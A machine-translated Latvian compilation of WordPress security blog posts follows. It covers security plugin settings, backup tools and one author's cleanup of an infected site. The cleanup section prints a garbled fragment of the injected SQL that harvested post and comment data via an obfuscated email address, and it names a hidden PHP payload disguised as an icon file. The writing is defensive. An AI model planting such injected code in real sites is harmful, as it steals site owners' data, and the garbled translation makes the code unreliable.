Mani uzlauza. Jūs zināt, piemēram, VKontakte lapa. Bet viņi nelūdza naudu, bet izveidoja daudzas “kreisās” lapas ar saitēm uz dažādām vietnēm. Tad es domāju par sava emuāra aizsardzību. Un es atradu ideālo risinājumu.
Pirmā lieta, ko es izdarīju, bija sazināties ar tehnisko atbalstu ar lūgumu atjaunot manu vietni dienu pirms uzlaušanas, un desmit minūšu laikā man bija mans parastais emuārs.
Pēc tam es instalēju daudzus spraudņus, lai aizsargātu WordPress no uzlaušanas. Bet emuārs sāka šausmīgi palēnināties. Lapas tika ielādētas piecās līdz desmit sekundēs. Tas ir pārāk garš.
Sāku meklēt spraudņus, kas tik ļoti nenoslogo sistēmu. Es lasīju atsauksmes par šiem spraudņiem un arvien biežāk sāku paklupt uz All In One WP Security. Pamatojoties uz aprakstu, man ļoti patika un nolēmu ievietot savā blogā. Un viņš joprojām mani sargā, jo neko labāku neesmu satikusi.
Ko var darīt All In One WP Security (Wordpress aizsardzība viss vienā):Varu droši teikt, ka All In One WP Security drošības spraudnis ir labākā WordPress vietnes aizsardzība.
Viss vienā WP drošības iestatīšanaPārejot uz sadaļu Iestatījumi, pirmā lieta, kas jums jādara, ir izveidot rezerves kopijas:
Tas tiek darīts All In One WP drošības spraudņa iestatīšanas pirmajā lapā.
Pirms darba uzsākšanas izveidojiet dublējumu
Es apskatīšu tikai svarīgākos punktus.
viss vienā wp drošības spraudņa iestatījumi Vadības panelisŠeit mūs sagaida “Drošības skaitītāja” skaitītājs. Tas parāda vietnes drošības līmeni. Jūsu vietnei ir jāatrodas vismaz zaļajā zonā. Nav nepieciešams dzīties pēc maksimālā līmeņa - nevajadzīgi iestatījumi var traucēt vietnes funkcionalitāti. Sasniedz zelta vidusceļu.
Mainot spraudņa drošības iestatījumus, pie katra vienuma redzēsiet zaļu vairogu ar cipariem — tie ir skaitļi, kas tiek pievienoti kopējam drošības rādītājam.
skaitlis tiek pievienots kopējam drošības rādītājam Iestatījumi WP Version Info cilneiAtzīmējiet izvēles rūtiņu Dzēst WP ģeneratora metadatus.
Tas tiek darīts, lai kodā netiktu parādīta jūsu instalētā WordPress dzinēja versija. Uzbrucēji zina, kurā versijā ir ievainojamības, un, zinot, kāda WordPress versija ir instalēta jums, varēsiet ātrāk uzlauzt jūsu vietni.
Administratora WP lietotājvārdsJa jūsu lietotājvārds, lai ievadītu administratora paneli, ir admin, noteikti nomainiet to. Admin ir vispopulārākā pieteikšanās. Daudzas SPS to piedāvā pēc noklusējuma, un cilvēki vienkārši ir pārāk slinki, lai to mainītu.
Uzbrucēji izmanto dažādas programmas, lai uzlauztu vietnes. Šīs programmas atlasa pieteikumvārdus un paroles, līdz atrod piemērotu kombināciju.
Tāpēc neizmantojiet administratora pieteikšanos.
Ja jūsu segvārds sakrīt ar jūsu pieteikumvārdu, noteikti nomainiet savu pieteikumvārdu vai segvārdu.
ParoleJa ievadīsiet savu paroli šeit, spraudnis parādīs, cik ilgs laiks būs nepieciešams, lai uzlauztu jūsu vietni.
Ieteikumi paroles stiprināšanai:
Mēs to noteikti ieslēdzam. Ja 5 minūšu laikā kāds 3 reizes nepareizi ievada paroli, IP tiks bloķēta uz 60 minūtēm. Jūs varat ievietot vairāk, bet labāk to nedarīt. Var gadīties, ka jūs pats ievadāt paroli nepareizi un tad gaidāt mēnešus vai pat gadus :)
Atzīmējiet izvēles rūtiņu “Nekavējoties bloķēt nederīgus lietotājvārdus”.
Pieņemsim, ka jūsu pieteikšanās ir hozyainsayta, un, ja kāds ievada citu pieteikumvārdu (piemēram, pieteikšanās), viņa IP adrese tiks automātiski bloķēta.
Ieliekam ķeksīti. Ja piesakāties vietnes administratora panelī no cita datora un aizmirstat atteikties no administratora paneļa, pēc noteikta laika sistēma jūs atteiks.
Es iestatīju to uz 1440 minūtēm (tas ir 24 stundas).
Atzīmējiet “Aktivizēt jaunu reģistrāciju manuālu apstiprināšanu”
Ieliekam arī ķeksīti. Tas pārtrauc robota mēģinājumus reģistrēties, jo roboti nevar tikt galā ar captchas.
Reģistrācija HoneypotSvinēsim. Un mēs neatstājam robotiem nevienu iespēju. Šis iestatījums izveido papildu neredzamu lauku (ievadiet šeit Ievadiet tekstu). Šo lauku var redzēt tikai roboti. Tā kā viņi automātiski aizpilda visus laukus, viņi kaut ko ierakstīs šajā laukā. Sistēma automātiski bloķē tos reģistrācijas mēģinājumus, kuriem ir aizpildīts šis lauks.
Datu bāzes aizsardzība Datu bāzes tabulas prefikssJa jūsu vietne pastāv jau ilgu laiku un tajā ir daudz informācijas, datu bāzes prefiksa maiņa jāveic ar vislielāko piesardzību.
noteikti dublējiet savu datu bāzi
Ja tikko izveidojāt savu vietni, varat droši mainīt prefiksu.
Iespējot automātisku dublējumu izveidi.
Izvēlieties dublējumu izveides biežumu.
Un to failu skaits ar šīm dublējumkopijām, kas tiks saglabāti. Tad viņi sāks pārrakstīt.
Ja vēlaties, lai šie faili tiktu papildus nosūtīti uz jūsu e-pastu, atzīmējiet atbilstošo izvēles rūtiņu. Manā pastkastē šiem nolūkiem tiek sūtītas visas (manu un klientu vietņu) dublējumkopijas.
Šeit mēs mainām failu atļaujas, lai viss būtu zaļš.
Mēs to iestatām, ja nerediģējat failus, izmantojot administratora paneli. Parasti visas izmaiņas failos ir jāveic, izmantojot ftp pārvaldnieka programmas (piemēram, Filezilla). Tātad, ja rodas kāds “avārijs”, jūs vienmēr varat atcelt iepriekšējo darbību.
Mēs liedzam piekļuvi. Ar šo darbību mēs varam paslēpt hakeriem svarīgu informāciju.
Melnais sarakstsJa jums jau ir IP adreses, kurām vēlaties liegt piekļuvi vietnei, iespējojiet šo opciju.
Ugunsmūris un ugunsmūris ir programmatūras pakotne, kas filtrē nesankcionētu trafiku.
Šie noteikumi tiek pievienoti .htaccess failam, tāpēc mēs vispirms izveidojam tā dublējumkopiju.
Tagad varat atzīmēt vajadzīgās rūtiņas:
Šajā cilnē atzīmējiet šādas izvēles rūtiņas:
Mēs atzīmējam abus punktus. Šis ir pārbaudīts noteikumu saraksts, ko spraudnis nodrošina WordPress vietnes drošībai.
Var rasties problēmas ar vietnes indeksēšanu. Es neaktivizēju šo opciju.
Novērst karstās saitesIeliekam ķeksīti. Lai attēli no jūsu vietnes netiktu rādīti citās vietnēs, izmantojot tiešu saiti. Šī funkcija samazina servera slodzi.
404 noteikšanaNepareizi ievadot lapas adresi, parādās kļūda 404 (šādas lapas nav). Hakeri ir brutāls spēks, kas cenšas atrast lapas ar ievainojamību un tāpēc īsā laika periodā ievada daudzus neesošus URL.
Šādi uzlaušanas mēģinājumi tiks ievadīti šīs lapas tabulā un, atzīmējot izvēles rūtiņu, jūs varēsiet bloķēt viņu IP adreses uz noteiktu laiku.
Pēc noklusējuma visām WordPress vietnēm ir viena un tā pati pieteikšanās lapas adrese. Tāpēc uzbrucēji precīzi zina, kur sākt vietnes uzlaušanu.
Šī opcija ļauj mainīt šīs lapas adresi. Šī ir ļoti laba WordPress vietnes aizsardzība. Noteikti mainām adresi. Es neatzīmēju šo izvēles rūtiņu, jo manējā sistēma automātiski mainīja šo lapu manā vietā sistēmas instalēšanas laikā.
Es neiespējoju šo iestatījumu, jo pastāv iespēja bloķēt sevi, piesakoties no dažādām ierīcēm.
CAPTCHA, lai pieteiktosJa jūsu vietnē ir daudz lietotāju vai jums ir tiešsaistes veikals, varat iespējot Captcha, kad piesakāties visos punktos.
Vai jūs piesakāties administratora zonā tikai no sava mājas datora un esat vienīgais savas vietnes lietotājs? Pēc tam ievadiet savu IP adresi, un visiem pārējiem tiks liegta piekļuve autorizācijas lapai.
Tas ir smieklīgi, kā dzīvē dažreiz notiek lietas. Es uzgāju foršu kursu par Udemy on modernas metodes vietņu aizsardzība un uzlaušana. Paaugstinot savu prasmju līmeni, es neļāvu savam emuāram inficēties ar vīrusiem. Visticamāk, WordPress lietotāji tā vai citādi ir saskārušies ar simptomiem, kurus aprakstīšu tālāk. Ja nē, tad jums ir paveicies. Es pati esmu ļoti ilgu laiku Es vietnēm neko nepievienoju, domājot par to, kā viņiem tomēr izdevās inficēt savus tīmekļa resursus. Vēl 2014. gadā mani pārsteidza ziņojumi forumos, ka viņu vietne ar izcilu apmeklētāju ir vienkārši inficēta un atņemta.
Un tā, šorīt es saņēmu vēstuli no sava saimnieka, kas mani samulsināja. Jā, es biju patīkami pārsteigts, ka ihc pārrauga vietnes, vai tajās nav ļaunprogrammatūras, taču ziņa, ka viens fails tika mainīts vienas nakts laikā bez manas ziņas un tas ir aizdomas par vīrusu darbību, izraisīja haotiskas emocijas. Patiesībā tas bija apstiprinājums manām aizdomām.
Pirms kāda laika es atklāju, ka metrika satur pārejas uz vietnēm, kuras es vienkārši nevaru iekļaut savos ziņojumos. Kad es mēģināju atrast šīs saites muļķīgi, izmantojot emuāru meklētājprogrammu, es tiku novirzīts uz Apache ar kļūdas ziņojumu. Pat tad, aizdomājoties, ka kaut kas nav kārtībā, es devos meklēšanā. aktīvās tēmas php, kurā es redzēju neskaidru kodu. Tad tas mani iedzina stuporā, bet laika trūkuma dēļ tālāk nerakās. Kā izrādījās, tas bija veltīgi. Galu galā šī bija viena no infekcijas pazīmēm.
Kodētas ļaunprātīgas programmatūras piemērs
Es muļķīgi paļāvos uz rīkiem, lai noteiktu ļaunprātīgu kodu no dažādiem pakalpojumiem, kas piegružo internetu. Viņi visi “priecīgi” mani informēja, ka vieta ir tīra kā rīta rasa.
Iedomājieties paradoksālu situāciju - ir nestrādājoša meklēšanas funkcija, ir neskaidrs PHP kods, lai neveiksmīgais tīmekļa pārzinis neredzētu “dāvanu”, un pretvīrusu pakalpojumi vienkārši klusē.
Bet atgriezīsimies pie mūsu aitām vai, pareizāk sakot, vietnēm. Visās šajās vietnēs man ir divu līmeņu autorizācija. Varbūt tas pasargāja vietni no hakera. Divas dienas pēc search.php inficēšanas manā e-pastā atnāca paziņojums no ihc.ru, ka daži faili ir mainīti un, ja neko nedaru, ieteicams pārbaudīt ar antivīrusu, ko nodrošina pats hostings. Nu, lūk, ir iespēja pārbaudīt šo antivīrusu, žēl, ka mana mīļākā vietne tikko kļuva par testa priekšmetu :)
Testa rezultāts, maigi izsakoties, mani diezgan neizpratnē. Antivīruss pārmeklēja vietni apmēram četrdesmit minūtes un pēc tam nosūtīja savu "spriedumu". 42 faili tika inficēti...
Šis bija laiks saķert galvu, domājot par to, kā kaut kas tāds vispār var notikt. Pats par sevi saprotams, ka notikusi ekspluatācija. Bet vairāk par to vēlāk.
Bija nepieciešams vietni apstrādāt, taču šim nolūkam tā bija rūpīgi jāpārbauda. Jā, to varēja izdarīt daudz vienkāršāk - izmest datu bāzi, pārsūtīt attēlus no wp-content un atkārtoti augšupielādēt to visu tikko instalētajā WordPress dzinējā. Bet “vieglāk” nenozīmē “labāk”. Patiesībā, nezinot, kas tika mainīts, varēja gaidīt, ka caurums parādīsies atkārtoti augšupielādētajā vietnē. Un tad bija pienācis laiks kļūt par jaunizveidoto Šerloku Holmsu, lai veiktu pilnu vietnes auditu.
Ļaunprātīgas programmatūras atrašana ir kā detektīvs
Godīgi sakot, tādu sajūsmu un interesi nebiju jutis jau sen. Jā, mitināšanas antivīruss man ļoti palīdzēja, norādot, kuros failos tika konstatētas izmaiņas. Bet pat viņš nevarēja visu atklāt pilnībā, jo kods mainījās starp apmulsināšanu un banālu heksadecimālo kodēšanu, izmantojot ļaunprātīgu js. Daudz kas bija jādara ar rokām, izmantojot visus trešo pušu rīkus tikai kā palīgus.
Tātad, palaidīsim koda redaktoru un apskatīsim inficētos failus. Faktiski kodā tie “sadeg” diezgan ātri to šifrētā rakstura dēļ. Tomēr tas tā nav visur. Gadījās, ka vajadzēja rindiņu pa rindiņai parsēt php faila kodu un izdomāt, kas tam par vainu. Uzreiz teikšu, ka tas notika ar motīvu failiem. Šajā gadījumā oriģinālie motīvu faili būs ļoti noderīgi salīdzināšanai, ja neesat pārliecināts, kāpēc tieši tā vai cita funkcija ir nepieciešama (un pareizi uzrakstītam vīrusam vajadzētu mantot pēc iespējas mazāk).
Bet paskatīsimies uz visu pēc kārtas. Raksta sākumā jau esmu ievietojis vīrusa apmulsinātā koda ekrānuzņēmumu. Izmantojot resursu https://malwaredecoder.com/, varat to atšifrēt sagremojamā formā un izpētīt. Manā gadījumā dažos failos bija injekcija. Izdzēsīsim to visu ellē.
Tomēr dažreiz jūs varat saskarties ar īsu kodu ar iekļautu. Kā likums, indekss. php un wp-config. php. Diemžēl es neuzņēmu šāda koda ekrānuzņēmumu, jo tajā laikā es neplānoju rakstīt rakstu. No šī koda bija skaidrs, ka tas ir js kodēts kods konkrēta faila izsaukšanai. Lai atšifrētu heksadecimālo kodu, mēs izmantosim pakalpojumu http://ddecode.com/hexdecoder/, ar kuru mēs noteiksim, ka fails tiek izsaukts vietnē wp-includes/Text/Diff/.703f1cf4.ico (es izlaidu pilnu ceļš, būtība ir svarīga) . Vai, jūsuprāt, ir vērts kodēt zvanu uz vienkāršu ikonu failu, kaut arī ar salīdzinoši vienkāršu kodēšanu? Es domāju, ka atbilde ir acīmredzama un atveriet šo "ikonu", izmantojot piezīmju grāmatiņu. Protams, atkal izrādījās, ka tas ir pilnībā kodēts php fails. Izdzēsīsim.
Notīrot acīmredzamos failus, varat pāriet uz ne tik acīmredzamajiem — WordPress motīvu failiem. Šeit apmulsināšana netiek izmantota, jums ir jāizrakās kods. Patiesībā, ja jūs nezināt, ko izstrādātājs sākotnēji bija iecerējis, tad šis uzdevums ir ļoti radošs, lai gan to var atrisināt diezgan ātri. Ja neesat mainījis motīva kodu, ir vieglāk nomainīt inficētos failus (antivīruss tos ir precīzi identificējis) un turpināt darbu. Vai arī varat veikt rakšanas darbus, kā es to darīju, un konstatēt, ka ļoti bieži funkcijai tiek pievienoti šāda veida vīrusi. php absolūti kreisā funkcija, kurā, iespējams, būs kods piekļuvei sql. Manā gadījumā tas izskatās šādi (formatējums nav mainīts):
$sq1="ATLASĪT ATŠĶIRĪGUMA ID, ziņas_nosaukums, ziņas_saturs, ziņas_parole, komentāra_ID, komentāra_ziņas_ID, komentāra_autors, komentāra_datuma_gmt, komentārs_apstiprināts, komentāra_veids, SUBSTRING(komentāra_saturs,1,$src_length) AS com_excerpt $OUTERwINpments>p. ziņas IESLĒGTS ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" A ND post_author=\"li".$sepr."vethe". $comment_types."mes".$sepr."@".$c_is_approved."gm".$comment_auth."ail".$sepr.".".$sepr."co"."m\" UN post_password=\ "\" UN comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";
Mēs jau esam noskaidrojuši, kur šī atlase nonāk. Tāpēc mierīgi paskatāmies, kurā funkcijā ir šis kods un visu šo funkciju izdzēšam – to piešķīrusi ļaunprogrammatūra. Bet, es atkārtoju, ir daudz vieglāk un labāk pārrakstīt visu failu no gatavas tēmas, ja baidāties kaut ko sabojāt.
Pēdējais pieskāriens ir vietnes lietotāju skaita pārbaude. Visas savas vietnes vienmēr esmu vadījis pats. Attiecīgi citu lietotāju nevar un nedrīkst būt. Tomēr, ņemot vērā infekciju, ir viegli uzminēt, ka viņi mēģinās nozagt vietni un izveidot savu lietotāju ar administratora tiesībām. Manā gadījumā izrādījās wp.service.controller.2wXoZ . Izdzēsīsim.
Liels darbs ir paveikts, bet vai ir izplūde? Vēlreiz pārbaudīsim ar antivīrusu, kas ziņo, ka vīrusi vairs nav konstatēti. Tas ir viss, vietne ir izārstēta.
Rezultāti
Kā redzat, vietnes konservēšana ir diezgan vienkārša, lai gan tas ir laikietilpīga. Pēc ārstēšanas ir nepieciešams novērst līdzīgas situācijas nākotnē. Ir jāveic tikai dažas darbības:
Es mēģināju izmantot savu piemēru, lai parādītu, kā jūs varat izārstēt WordPress vietni. Vietnē ihc.ru esošais pretvīruss ir vienkārši ļaunprātīgas programmatūras skeneris. Bet viņš arī labi vienkāršoja darbu. Tomēr pat tad, ja jūsu mitināšanai nav šāda pakalpojuma, varat izmantot iepriekš minēto algoritmu, lai identificētu un novērstu infekciju.
WordPress satura pārvaldības sistēma tās milzīgās popularitātes dēļ piesaista arī nelabvēļus. Turklāt “dzinējs” tiek izplatīts bez maksas, tāpēc tas ir vēl vairāk pakļauts drošības pārkāpumu riskam. WordPress pati par sevi ir diezgan drošs programmatūras produkts. “Caurumi” sāk atvērties, kad lietotājs instalē spraudņus un motīvus.
Spraudņu un motīvu nedrošībaDiemžēl jūs ne vienmēr varat būt pārliecināts, ka motīvi vai spraudņi ir droši un nekaitīgi. Viņu maksas versijām ir ļoti specifiski izstrādātāji, kuri novērtē viņu reputāciju. Līdz ar to viņu produkti ir kvalitatīvāki, un iespēja ar tiem saņemt jebkādu ļaunprātīgu kodu ir diezgan zema. Bet, kā liecina mūsu dzīves pieredze, jebkuram noteikumam ir izņēmumi. Daži pievieno pilnīgi nekaitīgu kodu, lai sniegtu atsauksmes, bet citi to dara pilnīgi citiem mērķiem. Pat pašā “dzinējā” dažreiz tiek atklātas ievainojamības, kas ļauj uzbrucējam ievadīt savu kodu tā kodolā.
Vīrusu aizsardzības spraudņiPar laimi, WordPress ir vairāki noderīgi risinājumi, kas var pilnībā skenēt jūsu resursus, lai atrastu visa veida ievainojamības un ļaunprātīgu kodu, un, ja tiek atklāts, norādīt to konkrēto atrašanās vietu vai pilnībā tos neitralizēt. Apskatīsim vairākus diezgan kvalitatīvus un uzticamus spraudņus, lai aizsargātu jūsu WordPress vietni.
Sucuri drošībaBezmaksas spraudnis Sucuri Security ir vadošais drošības rīks, un to izmanto liels skaits WordPress lietotāju. Risinājums nodrošina vietnēm vairākus aizsardzības veidus un līmeņus, tostarp:
Wordfence Security ir risinājums, kas veic tīmekļa resursa padziļinātu skenēšanu, lai atklātu ievainojamības un ļaunprātīgu kodu ne tikai motīvu un spraudņu failos, bet arī pašā dzinēja kodolā.
Lai pārraudzītu savienojumus, spraudnis izmanto WHOIS pakalpojumus. Pateicoties iebūvētajam ugunsmūrim, tas spēj bloķēt veselus tīklus. Tiklīdz tiek atklāts tīkla uzbrukums, ugunsmūra kārtulu kopa tiek automātiski atjaunināta, lai visefektīvāk cīnītos pret draudiem.
AntivīrussAntiVirus spraudnis katru dienu skenē visus vietnes failus (ieskaitot motīvus, datubāzi) un nosūta e-pasta ziņojumu uz norādīto adresi. Turklāt AntiVirus skenē un notīra pēdas, kad tiek noņemti spraudņi.
Quttera tīmekļa ļaunprātīgas programmatūras skenerisSpēcīgā Quttera Web ļaunprātīgas programmatūras skenera skenēšanas un noteikšanas sarakstā ir iekļautas šādas ievainojamības:
Papildus šim sarakstam spraudnis pārbauda vietnes klātbūtni melnajos sarakstos.
Drošība pret ļaunprātīgu programmatūru un brutāla spēka ugunsmūrisAnti-Malware Security un Brute-Force Firewall pievienojumprogramma ir izstrādāta, lai skenētu un neitralizētu pašlaik zināmās ievainojamības, tostarp backdoor skriptus. Spraudņa pretvīrusu datubāzes tiek automātiski atjauninātas, ļaujot atklāt jaunākos vīrusus un izlietojumus. Spraudnim ir iebūvēts ugunsmūris, kas bloķē tīkla draudus.
Spraudņa īpatnība ir tā, ka tas nodrošina vietnes papildu aizsardzību (aizsardzību pret brutālu spēku un DDoS uzbrukumiem, kā arī WordPress kodola integritātes pārbaudi). Lai to izdarītu, jums vienkārši jāreģistrējas vietnē gotmls.net.
WP pretvīrusu vietnes aizsardzībaWP Antivirus Site Protection skenē visus drošībai kritiskos vietņu failus, tostarp motīvus, spraudņus un augšupielādētos failus augšupielādes mapē. Jebkurš atrastais ļaunprātīgais kods vai vīrusi tiks nekavējoties noņemti vai ievietoti karantīnā.
Exploit ScannerExploit Scanner spraudnis ir paredzēts tikai aizdomīga koda (vietņu failu un datu bāzes) identificēšanai. Tiklīdz kaut kas tiks atklāts, vietnes administrators tiks nekavējoties informēts.
Centrora WordPress drošībaVisaptverošais risinājums Centrora WordPress Security ir daudzpusīgs rīks tīmekļa resursa aizsardzībai no visa veida draudiem. Tas ietver šādas funkcijas:
Lūdzu, noklikšķiniet uz vienas no pogām, lai uzzinātu, vai raksts jums patika vai nē.
Man patīk, man nepatīk
Krāpnieki var mēģināt uzbrukt vietnei, lai uzlauztu administratora paneli, nozagtu lietotāju paroles, mainītu vietnes kodu, piekļūtu konfidenciālai informācijai, ievietotu slēptās saites vai citādi kaitētu resursam. Šādu uzbrukumu dēļ jūs varat zaudēt klientus, pozīcijas meklēšanas rezultātos, reputāciju vai pat pašu vietni.
WordPress pati par sevi ir diezgan drošs dzinējs, taču ar elementāru aizsardzību nepietiek.
Infekciju statistika par 2017. gadu
Speciālie spraudņi palīdzēs palielināt vietnes drošību, tie nepadarīs vietni pilnīgi neaizsargātu pret jebkādiem uzbrukumiem, bet kavēs uzbrucējus.
Spraudņi jūsu WordPress vietnes aizsardzībai Viss vienā WP drošība un ugunsmūrisSpraudnis aizsargā lietotāju kontus, koda failus un padara drošāku pieteikšanos vietnē personīgie konti, veido datu bāzes dublējumkopijas.
Ko dara spraudnis:
Par spraudņa iestatīšanu ir skaidrs:
All In One WP Security & Firewall ir tulkots krievu valodā, instalēšana ir bezmaksas.
Ložu necaurlaidīga drošībaSpraudnis skenē ļaunprātīgu kodu, aizsargā autorizāciju vietnē, nelaiž cauri surogātpastu un veido rezerves kopijas.
Ko dara spraudnis:
Vairāk par drošības līdzekļiem lasiet spraudņa lapā.
Spraudnis ir tulkots krievu valodā. Tas ir bezmaksas, ir premium versija ar uzlabotu vietņu aizsardzību un uzbrukumu novēršanas iespējām.
Wordfence drošībaAizsargā SPS no uzlaušanas un ļaunprātīgas programmatūras uzbrukumiem, aizsargājot vietnes pieteikšanos, koda izmaiņu skenēšanu, pieteikšanās mēģinājumus un paziņojumus par aizdomīgām darbībām.
Ko dara spraudnis:
IN bezmaksas versija Ir pieejamas arī citas funkcijas.
Premium versija sniedz nedaudz vairāk:
Vairāk par drošības līdzekļiem lasiet spraudņa lapā.
Nav tulkots krievu valodā, pamata versiju var lejupielādēt bez maksas.
Atspējot XML-RPC PingbackVietne novērš iespējamo XML-RPC ievainojamību, ar kuras palīdzību krāpnieki var uzbrukt citām vietnēm un palēnināt jūsu resursu.
Ko dara spraudnis:
Spraudnis ieslēgts angļu valoda, uzstādīšana ir bezmaksas.
iThemes drošībaVecais nosaukums ir Labāka WP drošība. Spraudnis aizsargā, piesakoties administratora panelī, un veic pretvīrusu funkcijas.
Ko dara spraudnis:
Vairāk par drošības līdzekļiem lasiet spraudņa lapā.
Tulkots krievu valodā un pieejams bez maksas.
Sucuri drošībaVisaptverošs spraudnis, kas uzrauga vietnes failu izmaiņas un veic pretvīrusu funkcijas.
Ko dara spraudnis:
Premium versijā tas izveido ugunsmūri papildu aizsardzībai pret uzbrukumiem. Lasiet vairāk par drošības līdzekļiem spraudņa lapā.
Spraudnis nav tulkots krievu valodā, bet ir pieejams bezmaksas lejupielādei.
Atslēgas divu faktoru autentifikācijaSpraudnis administratora paneļa aizsardzībai no iebrucējiem, padarot piekļuvi administratora panelim ērtāku un ātrāku.
Ko dara spraudnis:
Spraudnis nav tulkots un ir pieejams bez maksas.
WWPass divu faktoru autentifikācijaSpraudnis aizsardzībai pret iebrucēju iekļūšanu administratora panelī.
Ko dara spraudnis:
Ir pieejama bezmaksas versija angļu valodā.
Ja uzbrucējiem izdevās kaut ko izdarīt ar vietni un ir jāatjauno tā iepriekšējā stāvoklī, dublējumkopijas palīdzēs. Parasti mitinātāji periodiski veido dublējumus, taču katram gadījumam labāk ir izveidot dublējumus pašiem. Daži spraudņi no atlases var izveidot kopijas, un ir arī atsevišķi risinājumi dublēšanai.
Spraudņi vietņu dublēšanai pakalpojumā WordPress BackWPup — WordPress dublēšanas spraudnisSpraudnis dublējumu izveidei un iepriekšējo vietnes versiju atjaunošanai.
Ko dara spraudnis:
Maksas PRO versija šifrē arhīvus ar dublējumkopijām un atjauno dublējumkopijas ar pāris klikšķiem.
Pieejams bez maksas, ir apmaksāta PRO versija, bet nav tulkota krievu valodā.
UpdraftPlus WordPress dublēšanas spraudnisKo dara spraudnis:
Uzlabotā versija sniedz plašāku iespēju izvēlēties kopiju uzglabāšanas vietas un citas papildu funkcijas.
Nav tulkots krievu valodā, pieejams bez maksas.
VaultPressVēl viens spraudnis dublēšanai un uzticamai kopiju glabāšanai.
Ko dara spraudnis:
Darbojas bez maksas vienā vietnē, glabā datus 30 dienas. Par papildu samaksu varat pārraudzīt vairākas vietnes no viena paneļa un saglabāt datus ilgāk.
Spraudnis nav tulkots krievu valodā, bet ir pieejams instalēšanai bez maksas.
Vietnēm ir nepieciešama aizsardzība pret iebrucējiem, lai tās nevarētu piekļūt sensitīvai informācijai, izmantot jūsu resursus, lai uzbruktu citām vietnēm, nosūtītu vēstules klientiem un traucētu resursa stabilu darbību. Spraudņi rada šķēršļus krāpniekiem, aizsargā lietotāju datus un vietnes kodu, un dublēšanas sistēmas atgriezīs vietni tās iepriekšējā stāvoklī, ja uzbrucējiem izdevās nodarīt kaitējumu.
Pirms izdomājat, kā tīrīt WordPress vietni, jums ir jāsaprot, ar ko tieši mēs nodarbosimies. Plašā nozīmē jēdziens “vīruss” nozīmē ļaunprātīgu programmatūru, kas var nodarīt zināmu kaitējumu tīmekļa resursa īpašniekam. Tādējādi šajā kategorijā var iekļaut gandrīz jebkuru kodu, ko uzbrucēji ir ieguluši programmas skriptos. Tās varētu būt slēptās saites, kas izraisa pesimizāciju meklēšanas rezultātos, aizmugures durvis, kas nodrošina hakeram administratora piekļuvi, vai sarežģītas struktūras, kas vietni pārvērš par zombiju tīkla mezglu un pat Bitcoin kalnraču. Runāsim par to, kā atpazīt un likvidēt dažāda kalibra vīrusus, kā arī aizsargāties pret tiem.
Daudzi iepriekšējos rakstos minētie padomi var aizsargāt jūsu vietni no infekcijas. Piemēram, pirātiskās veidnēs un spraudņos var atrast “infekciju”, šādu komponentu pilnīga noraidīšana ir svarīgs solis no drošības viedokļa. Tomēr ir vairākas specifiskākas nianses.
1. Instalējiet uzticamu antivīrusuĻaunprātīga programma var tikt ieviesta ne tikai no ārpuses, infekcijas avots ļoti labi varētu būt dators, no kura tiek administrēts projekts. Mūsdienu Trojas zirgi var ne tikai nozagt FTP paroli, bet arī paši lejupielādēt izpildāmo kodu vai modificēt CMS failus, kas nozīmē, ka jūsu tīmekļa resursa drošība ir tieši atkarīga no jūsu darba iekārtas drošības.
IT tirgus piedāvā daudz antivīrusu. Tomēr saprātīgākā izvēle ir lielo uzņēmumu produkti:
● Starp vietējiem produktiem vadošās pozīcijas ieņem Kaspersky Lab un Dr. Web.
● Starp ārvalstu komerciālajiem risinājumiem var izcelt Symantek Corporation Norton līniju un populāro ESET NOD;
● Ja mēs runājam par bezmaksas iespējām, tad Avast un Comodo šeit ir neapstrīdami līderi.
Ja tiek atklātas aizdomīgas darbības (dzinēja kļūdas, bremzes, uznirstošie logi un trešo pušu baneri), visvienkāršākā lieta, ko varat iedomāties, ir palaist resursu, izmantojot tiešsaistes skeneri, kas var noteikt inficēšanās faktu. Šeit neapstrīdams līderis ir VirusTotal, kas atrodas vietnē virustotal.com. Lai to izmantotu, vienkārši dodieties uz cilni “URL adrese”, ievadiet jūs interesējošo saiti un noklikšķiniet uz pogas “Pārbaudīt!”.
Pēc kāda laika sistēma izdos ziņojumu ar šādu saturu:
Jāprecizē: VirusTotal nav neatkarīgs projekts, bet gan sava veida pretvīrusu skeneru agregators. Šajā sakarā kļūst iespējams pārbaudīt WordPress vīrusus 67 sistēmās vienlaikus. Neapšaubāma priekšrocība ir detalizēts pārskats, kas sniedz datus par visiem atbalstītajiem pakalpojumiem. Galu galā antivīrusiem ļoti patīk radīt viltus trauksmes, tāpēc pat tad, ja noteikšanas ātrums atšķiras no ideālā (piemēram, 3/64), tas nenozīmē, ka resurss ir inficēts. Koncentrējieties galvenokārt uz lieliem spēlētājiem (Kaspersky, McAfee, Symantec NOD32 un citi mazie uzņēmumi bieži identificē noteiktas koda sadaļas kā bīstamas - neuztveriet to nopietni);
3. Izmantojiet Yandex.WebmasterDroši vien pamanījāt, ka uz dažām saitēm meklēšanas rezultātos ir brīdinājuma ziņojums: "Vietne var apdraudēt jūsu datoru vai mobilo ierīci." Fakts ir tāds, ka meklētājprogrammai ir savi algoritmi ļaunprātīga koda noteikšanai, informējot lietotājus par iespējamo risku. Lai būtu informēts par notiekošo un pirmais saņemtu paziņojumus, vienkārši reģistrējieties Webmaster pakalpojumā. Visu nepieciešamo informāciju varat skatīt cilnē “Drošība”:
Ja tiek atklāts apdraudējums, šeit tiks parādīta informācija par inficētajām lapām. Diemžēl selektīva WordPress skenēšana pret vīrusiem nav iespējama - Yandex to skenē neatkarīgi, turklāt izlasē nav iekļauti visi lejupielādētie tīmekļa dokumenti, bet tikai daļa no tiem, kas noteikti nejauši.
4. Pārbaudiet Google pārskatusPasaulē populārākā meklētājprogramma piedāvā vēl vienkāršāku pārraudzības veidu – vienkārši sekojiet saitei google.com/transparencyreport/safebrowsing/diagnostic/?hl=ru un attiecīgajā laukā ievadiet interesējošās vietnes adresi. Jūs saņemsiet visaptverošus datus par resursu un redzēsit, vai uzņēmumam Google ir kādas sūdzības saistībā ar ļaunprātīgu skriptu atklāšanu:
Kā attīrīt WordPress vietni no vīrusu saitēm?Pāriesim no vispārīgiem ieteikumiem pie konkrētiem. Sāksim ar izplatītākajiem kaitīgā koda variantiem — svešu URL ieviešanu un novirzīšanu uz mērķa tīmekļa resursu. Diemžēl melnā cepure SEO joprojām ir populārs, kas nozīmē, ka hakeri nesēž dīkā, par laimi šis uzdevums ir viens no vienkāršākajiem. Sakārtosim to secībā.
